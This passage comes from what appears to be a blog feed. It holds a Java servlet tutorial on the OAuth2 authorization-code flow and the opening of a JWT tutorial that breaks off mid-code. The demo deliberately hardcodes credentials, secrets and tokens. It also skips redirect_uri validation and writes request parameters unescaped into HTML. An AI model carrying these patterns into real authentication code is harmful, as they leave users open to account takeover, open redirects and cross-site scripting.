authentication</strong>.</p> <p>It is about <strong>delegating access</strong>.</p> <p>Instead of giving your username/password to an application, you allow it to access your data using a <strong>token issued by a trusted server</strong>.</p> <h3> 🔷 Actors in OAuth2 </h3> <p>This framework involves four key roles:</p> <h4> 1. Resource Owner (User) </h4> <p>The user who owns the data<br> Grants or denies access</p> <h4> 2. Client (Application) </h4> <p>The application requesting access to user data</p> <h4> 3. Authorization Server </h4> <p>Authenticates the user<br> Issues authorization code and access token</p> <h4> 4. Resource Server </h4> <p>Hosts protected data<br> Validates access tokens before responding</p> <h3> 🔷 Real-World Example </h3> <p>A common example is “Login with Google”.</p> <p><strong>User</strong> → You<br> <strong>Client</strong> → Airbnb<br> <strong>Authorization Server</strong> → Google<br> <strong>Resource Server</strong> → Google APIs</p> <p><strong>Flow</strong>:</p> <ol> <li>You click “Login with Google”</li> <li>You are redirected to Google</li> <li>You login and click <strong>Allow</strong> </li> <li>Google sends a **code **to the client</li> <li>Client exchanges code for <strong>token</strong> </li> <li>Client fetches your data using the token</li> </ol> <p>👉 This is exactly what we will implement.</p> <h3> 🔷 High-Level Flow </h3> <ol> <li>Client requests authorization from the user</li> <li>User authenticates and grants/denies access</li> <li>Authorization Server returns an <strong>authorization code</strong> </li> <li>Client exchanges code for <strong>access token</strong> </li> <li>Client uses access token to call Resource Server</li> <li>Resource Server validates token and returns data</li> </ol> <h3> 🔷 Endpoints in This Demo </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Endpoint</th> <th>Role</th> </tr> </thead> <tbody> <tr> <td>/login</td> <td>Starts OAuth flow (Client)</td> </tr> <tr> <td>/authorize</td> <td>User login + consent (Authorization Server)</td> </tr> <tr> <td>/callback</td> <td>Receives authorization code (Client)</td> </tr> <tr> <td>/getToken</td> <td>Helper to call token endpoint</td> </tr> <tr> <td>/token</td> <td>Issues access token</td> </tr> <tr> <td>/data</td> <td>Protected API (Resource Server)</td> </tr> </tbody> </table></div> <h3> 🔷 Full Flow Overview </h3> <p>/login <br> → redirect to /authorize<br> → user login + allow<br> → /callback (gets code)<br> → /token (gets access token)<br> → /data (uses token)</p> <h3> 🔷 Step-by-Step Flow with Code </h3> <blockquote> <p>Full implementation is available in the GitHub repository at the end of this article.<br> 🟢 Step 1: /login → Start Flow</p> </blockquote> <p>LoginServlet.java<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.oauth.demo</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.ServletException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.annotation.WebServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="cm">/** * Servlet implementation class LoginServlet */</span> <span class="nd">@WebServlet</span><span class="o">(</span><span class="s">"/login"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">LoginServlet</span> <span class="kd">extends</span> <span class="nc">HttpServlet</span> <span class="o">{</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doGet</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">redirect</span> <span class="o">=</span> <span class="s">"http://172.21.236.75:9090/oauth/authorize?"</span> <span class="o">+</span> <span class="s">"response_type=code&amp;client_id=test&amp;redirect_uri=http://172.21.236.75:9090/oauth/callback"</span><span class="o">;</span> <span class="n">resp</span><span class="o">.</span><span class="na">sendRedirect</span><span class="o">(</span><span class="n">redirect</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>This is the entry point. It redirects the user to the Authorization Server.</p> <p>resp.sendRedirect("<a href="http://host/oauth/authorize?...%22" rel="noopener noreferrer">http://host/oauth/authorize?..."</a>); </p> <p>👉 This is how the Client requests authorization from the User.</p> <p>🟢 Step 2: /authorize → User Login &amp; Consent</p> <p>AuthorizeServlet.java</p> <ul> <li>Displays login form</li> <li>Accepts username/password</li> <li>Allows user to <strong>Allow **/ **Deny</strong> </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.oauth.demo</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.ServletException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.annotation.WebServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="cm">/** * Servlet implementation class AuthorizeServlet */</span> <span class="nd">@WebServlet</span><span class="o">(</span><span class="s">"/authorize"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">AuthorizeServlet</span> <span class="kd">extends</span> <span class="nc">HttpServlet</span> <span class="o">{</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doGet</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">setContentType</span><span class="o">(</span><span class="s">"text/html"</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span> <span class="s">"&lt;form method='post'&gt;"</span> <span class="o">+</span> <span class="s">"User: &lt;input name='username'/&gt;&lt;br/&gt;"</span> <span class="o">+</span> <span class="s">"Pass: &lt;input name='password' type='password'/&gt;&lt;br/&gt;"</span> <span class="o">+</span> <span class="s">"&lt;button name='action' value='allow'&gt;Allow&lt;/button&gt;"</span> <span class="o">+</span> <span class="s">"&lt;button name='action' value='deny'&gt;Deny&lt;/button&gt;"</span> <span class="o">+</span> <span class="s">"&lt;input type='hidden' name='redirect_uri' value='"</span> <span class="o">+</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"redirect_uri"</span><span class="o">)</span> <span class="o">+</span> <span class="s">"'/&gt;"</span> <span class="o">+</span> <span class="s">"&lt;/form&gt;"</span> <span class="o">);</span> <span class="o">}</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doPost</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">action</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"action"</span><span class="o">);</span> <span class="nc">String</span> <span class="n">redirectUri</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"redirect_uri"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="s">"deny"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">action</span><span class="o">))</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">sendRedirect</span><span class="o">(</span><span class="n">redirectUri</span> <span class="o">+</span> <span class="s">"?error=access_denied"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">user</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"username"</span><span class="o">);</span> <span class="nc">String</span> <span class="n">pass</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"password"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="s">"admin"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">user</span><span class="o">)</span> <span class="o">&amp;&amp;</span> <span class="s">"password"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">pass</span><span class="o">))</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">code</span> <span class="o">=</span> <span class="s">"abc123"</span><span class="o">;</span> <span class="c1">// normally random + stored</span> <span class="n">resp</span><span class="o">.</span><span class="na">sendRedirect</span><span class="o">(</span><span class="n">redirectUri</span> <span class="o">+</span> <span class="s">"?code="</span> <span class="o">+</span> <span class="n">code</span><span class="o">);</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Invalid login"</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 Output:</p> <p>Success → ?code=abc123<br> Failure → ?error=access_denied</p> <p>🟢 Step 3: /callback → Client Receives Code</p> <p>CallbackServlet.java<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.oauth.demo</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.ServletException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.annotation.WebServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="cm">/** * Servlet implementation class CallbackServlet */</span> <span class="nd">@WebServlet</span><span class="o">(</span><span class="s">"/callback"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">CallbackServlet</span> <span class="kd">extends</span> <span class="nc">HttpServlet</span> <span class="o">{</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doGet</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">code</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"code"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">code</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Authorization failed"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="n">resp</span><span class="o">.</span><span class="na">setContentType</span><span class="o">(</span><span class="s">"text/html"</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span> <span class="s">"&lt;h3&gt;Authorization Code: "</span> <span class="o">+</span> <span class="n">code</span> <span class="o">+</span> <span class="s">"&lt;/h3&gt;"</span> <span class="o">+</span> <span class="s">"&lt;a href='/oauth/getToken?code="</span> <span class="o">+</span> <span class="n">code</span> <span class="o">+</span> <span class="s">"'&gt;Get Access Token&lt;/a&gt;"</span> <span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 This is the authorization code, a temporary credential.</p> <p>🟢 Step 4: /getToken → Prepare Token Request</p> <p>GetTokenServlet.java</p> <p>Creates a form to call /token:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.oauth.demo</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.ServletException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.annotation.WebServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="cm">/** * Servlet implementation class GetTokenServlet */</span> <span class="nd">@WebServlet</span><span class="o">(</span><span class="s">"/getToken"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">GetTokenServlet</span> <span class="kd">extends</span> <span class="nc">HttpServlet</span> <span class="o">{</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doGet</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">code</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"code"</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">setContentType</span><span class="o">(</span><span class="s">"text/html"</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span> <span class="s">"&lt;form method='post' action='/oauth/token'&gt;"</span> <span class="o">+</span> <span class="s">"&lt;input name='code' value='"</span> <span class="o">+</span> <span class="n">code</span> <span class="o">+</span> <span class="s">"'/&gt;&lt;br/&gt;"</span> <span class="o">+</span> <span class="s">"&lt;input name='client_id' value='test'/&gt;&lt;br/&gt;"</span> <span class="o">+</span> <span class="s">"&lt;input name='client_secret' value='secret123'/&gt;&lt;br/&gt;"</span> <span class="o">+</span> <span class="s">"&lt;button type='submit'&gt;Exchange Code for Token&lt;/button&gt;"</span> <span class="o">+</span> <span class="s">"&lt;/form&gt;"</span> <span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 In real systems, this happens server-to-server, not via UI.</p> <p>🟢 Step 5: /token → Exchange Code for Token</p> <p>TokenServlet.java<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.oauth.demo</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.ServletException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.annotation.WebServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="cm">/** * Servlet implementation class TokenServlet */</span> <span class="nd">@WebServlet</span><span class="o">(</span><span class="s">"/token"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">TokenServlet</span> <span class="kd">extends</span> <span class="nc">HttpServlet</span> <span class="o">{</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doPost</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">clientId</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"client_id"</span><span class="o">);</span> <span class="nc">String</span> <span class="n">clientSecret</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"client_secret"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="s">"test"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">clientId</span><span class="o">)</span> <span class="o">||</span> <span class="o">!</span><span class="s">"secret123"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">clientSecret</span><span class="o">))</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">setStatus</span><span class="o">(</span><span class="mi">401</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Invalid client"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">code</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"code"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="s">"abc123"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">code</span><span class="o">))</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">setStatus</span><span class="o">(</span><span class="mi">400</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Invalid code"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="c1">// Simple JWT-like token (replace with real JWT later)</span> <span class="nc">String</span> <span class="n">token</span> <span class="o">=</span> <span class="s">"header.payload.signature"</span><span class="o">;</span> <span class="n">resp</span><span class="o">.</span><span class="na">setContentType</span><span class="o">(</span><span class="s">"application/json"</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"{\"access_token\":\""</span> <span class="o">+</span> <span class="n">token</span> <span class="o">+</span> <span class="s">"\"}"</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>Returns:<br> {<br> "access_token": "header.payload.signature"<br> }<br> 👉 This is the Access Token</p> <p>🟢 Step 6: /data → Access Protected Resource<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">DataServlet</span><span class="o">.</span><span class="na">java</span> <span class="kn">package</span> <span class="nn">com.oauth.demo</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.ServletException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.annotation.WebServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServlet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jakarta.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="cm">/** * Servlet implementation class DataServlet */</span> <span class="nd">@WebServlet</span><span class="o">(</span><span class="s">"/data"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">DataServlet</span> <span class="kd">extends</span> <span class="nc">HttpServlet</span> <span class="o">{</span> <span class="kd">protected</span> <span class="kt">void</span> <span class="nf">doGet</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">req</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">resp</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">auth</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="na">getHeader</span><span class="o">(</span><span class="s">"Authorization"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">auth</span> <span class="o">==</span> <span class="kc">null</span> <span class="o">||</span> <span class="o">!</span><span class="n">auth</span><span class="o">.</span><span class="na">startsWith</span><span class="o">(</span><span class="s">"Bearer "</span><span class="o">))</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">setStatus</span><span class="o">(</span><span class="mi">401</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Unauthorized"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">token</span> <span class="o">=</span> <span class="n">auth</span><span class="o">.</span><span class="na">substring</span><span class="o">(</span><span class="mi">7</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="s">"header.payload.signature"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">token</span><span class="o">))</span> <span class="o">{</span> <span class="n">resp</span><span class="o">.</span><span class="na">setStatus</span><span class="o">(</span><span class="mi">403</span><span class="o">);</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Invalid token"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="n">resp</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Secure Data for user: admin"</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 Client must call:<br> Authorization: Bearer header.payload.signature</p> <p>If valid:<br> Secure Data for user: admin</p> <h3> 🔷 What is the Access Token in this Demo? </h3> <p>In OAuth2, the access token is just a string. The specification does not enforce any particular format.</p> <p>However, in most real-world systems, the access token is implemented as a JWT (JSON Web Token).</p> <p>In this demo, we return a simplified token:</p> <p>header.payload.signature</p> <p>This mimics the structure of a JWT.</p> <p>👉 For a detailed explanation of how JWT works (structure, signing, validation), you can refer to my earlier article:</p> <p>Understanding JWT Authentication in Java with Encryption and Decryption<br> (<a href="https://dev.to/sanjayghosh/understanding-jwt-authentication-in-java-with-encryption-and-decryption-2ig7">https://dev.to/sanjayghosh/understanding-jwt-authentication-in-java-with-encryption-and-decryption-2ig7</a>)</p> <p>In a production system:</p> <p>The Authorization Server generates a signed JWT<br> The Resource Server validates the JWT before granting access</p> <p>This bridges the gap between OAuth2 (authorization framework) and JWT (token format).</p> <h3> 🔷 Why This Flow Exists </h3> <p>Why not just send username/password to the client?<br> Because:</p> <ul> <li>Security risks ❌</li> <li>Third-party access problems ❌</li> <li>No control over permissions ❌</li> </ul> <p>OAuth2 solves this using:</p> <ul> <li>Tokens</li> <li>Delegated access</li> <li>Controlled permissions</li> </ul> <h3> 🔷 Common Mistakes </h3> <ul> <li>❌ Client handling user credentials</li> <li>❌ Confusing code vs token</li> <li>❌ Sending token in URL</li> <li>❌ Thinking client validates token</li> <li>❌ Skipping redirect-based flow ### 🔷 Important Notes</li> </ul> <h4> ⚠️ 1. This is a simplified demo </h4> <ul> <li>Hardcoded values</li> <li>No database</li> <li>No real token security</li> </ul> <h4> ⚠️ 2. Token is NOT a real JWT </h4> <p>header.payload.signature</p> <p>👉 In real systems:</p> <ul> <li>Token is a JWT</li> <li>Signed and verified</li> </ul> <h4> ⚠️ 3. Client Secret should NOT be exposed </h4> <p>In this demo:</p> <ul> <li>Shown in UI ❌</li> </ul> <p>In real OAuth:</p> <ul> <li>Used only in backend communication ✅</li> </ul> <h4> ⚠️ 4. Browser cannot send Authorization headers directly </h4> <p>Use:</p> <ul> <li>curl</li> <li>Postman</li> <li>Java client</li> </ul> <h4> ⚠️ 5. Resource Server must validate token </h4> <p>In real systems:</p> <ul> <li>Verify signature</li> <li>Check expiry</li> <li>Validate issuer</li> </ul> <h4> 🔷 Key Takeaways </h4> <ul> <li>OAuth2 is about delegation of access</li> <li>Client never sees user password</li> <li>Authorization Server issues tokens</li> <li>Resource Server enforces access</li> </ul> <p>Now that you understand the complete flow, let’s run it.</p> <h3> 🔷 Try It Yourself </h3> <p>If you want to understand OAuth2 deeply, I highly recommend running this demo locally.</p> <p>👉 GitHub Repository (complete working example with all servlets and configuration):<br><br> <a href="https://github.com/knowledgebase21st/Software-Engineering/tree/dev/security/OAUTH" rel="noopener noreferrer">https://github.com/knowledgebase21st/Software-Engineering/tree/dev/security/OAUTH</a></p> <h3> Steps: </h3> <ol> <li>Clone the repository </li> <li>Deploy it in Tomcat </li> <li>Open <code>/login</code> in your browser </li> <li>Follow the complete OAuth2 flow step by step </li> </ol> <p>Hands-on practice will make the concepts much clearer than theory alone.<br> If you run into any issues while trying this locally, feel free to leave a comment—I’ll be happy to help.</p> <h3> 🏁 Conclusion </h3> <p>OAuth2 may seem complex at first—but the core idea is simple:<br> 👉 The client never gets your password<br> 👉 The Authorization Server issues a token<br> 👉 The Resource Server trusts that token</p> <h3> 🔑 What You Built </h3> <p>You implemented:</p> <ul> <li>Client</li> <li>Authorization Server</li> <li>Resource Server</li> <li>Complete OAuth2 flow This is the same pattern used by Google and Microsoft.</li> </ul> <h3> 🔗 OAuth2 + JWT </h3> <ul> <li>OAuth2 = how you get the token</li> <li>JWT = what the token contains</li> </ul> <h3> ⚠️ Production Note </h3> <p>Use tools like Keycloak or frameworks like Spring Boot for real systems.</p> java security webdev oauth Understanding JWT Authentication in Java with Encryption and Decryption Sanjay Ghosh Thu, 19 Mar 2026 20:19:51 +0000 https://dev.to/sanjayghosh/understanding-jwt-authentication-in-java-with-encryption-and-decryption-2ig7 https://dev.to/sanjayghosh/understanding-jwt-authentication-in-java-with-encryption-and-decryption-2ig7 <p>JSON Web Token (JWT) is a widely used mechanism for securely transmitting information between systems.</p> <p>JWT is commonly used in:<br> • API authentication<br> • Single Sign-On (SSO)<br> • Microservices communication</p> <p>This article explains:</p> <ul> <li>What JWT is</li> <li>JWT structure</li> <li>How encryption and signing works</li> <li>How to generate and validate JWT in Java</li> <li>A simple diagram explaining the flow</li> </ul> <h2> What is JWT? </h2> <p>JWT (JSON Web Token) is a compact, URL-safe token format used to securely transmit information between two parties. <a href="https://datatracker.ietf.org/doc/html/rfc7519" rel="noopener noreferrer">Refer RFC7519</a> .</p> <p>A JWT contains claims (information) that are digitally signed and optionally encrypted.</p> <p>JWT tokens are typically used after a user logs in successfully. The server generates a token and sends it back to the client. The client includes this token in future requests for authentication.</p> <h2> JWT Structure </h2> <p>JWT Structure</p> <p>A JWT consists of three parts separated by dots:</p> <p>HEADER.PAYLOAD.SIGNATURE</p> <p>Example JWT:</p> <p>eyJhbGciOiJIUzI1NiJ9<br> .<br> eyJpc3MiOiJteS5jb21wYW55LmNvbSIsInN1YiI6ImpvaG4uZG9lIiwiaWF0IjoxNzczMTg0MTIwLCJleHAiOjE3NzMxODQ0MjAsImp0aSI6IjI1Y2JkNjVmLTYzODEtNGZiYi05YWMyLTk4ZTk0ZGYwYTI2YSJ9<br> .<br> UEG4iZhhtyG58V0Vcz-IHOL8MMPmDVqZdyRhoaTnYCI</p> <p>Each part is Base64URL encoded. ()</p> <h3> 1. Header </h3> <p>The header contains metadata about the token.</p> <p>Example:</p> <p>{"alg":"HS256"}</p> <p>alg indicates the algorithm used to sign the token.</p> <p>Common algorithms include:</p> <ul> <li>HS256</li> <li>RS256</li> <li>ES256</li> </ul> <h3> 2. Payload </h3> <p>The payload contains claims, which are pieces of information about the user.<br> Example:<br> { <br> "iss":"my.company.com",<br> "sub":"john.doe","iat":1773184120,<br> "exp":1773184420,<br> "jti":"25cbd65f-6381-4fbb-9ac2-98e94df0a26a"}<br> }</p> <p><strong>Note:</strong><br> JWT payload is not encrypted by default. It is only Base64 encoded.<br> Anyone can decode the payload, but the signature prevents tampering.</p> <h3> 3. Signature </h3> <p>The signature ensures the token has not been modified.<br> Example process:<br> HMACSHA256(<br> base64UrlEncode(header) + "." +<br> base64UrlEncode(payload),<br> secret<br> )<br> If someone modifies the payload, the signature verification will fail.</p> <h2> JWT Authentication Flow </h2> <p>Typical authentication flow:</p> <ol> <li>User logs in with username and password</li> <li>Server validates credentials</li> <li>Server generates a JWT</li> <li>Client stores the token</li> <li>Client sends JWT in Authorization header</li> <li>Server verifies the token</li> </ol> <p>Example header in API request:</p> <p>Authorization: Bearer </p> <h2> Generating JWT in java </h2> <p>(Example Code)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">jwt</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">io.jsonwebtoken.Jwts</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">io.jsonwebtoken.security.Keys</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.Key</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.time.Instant</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.time.temporal.ChronoUnit</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.Date</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.UUID</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.nio.charset.StandardCharsets</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">JwtTokenGenerator</span> <span class="o">{</span> <span class="cm">/** * Generates a signed JWT token using a shared secret key. * @param issuer The issuer of the token. * @param subject The subject of the token (e.g., user ID). * @param secretKey The secret key for signing (must be at least 256 bits). * @return The compact JWT string. */</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">generateJwtToken</span><span class="o">(</span><span class="nc">String</span> <span class="n">issuer</span><span class="o">,</span> <span 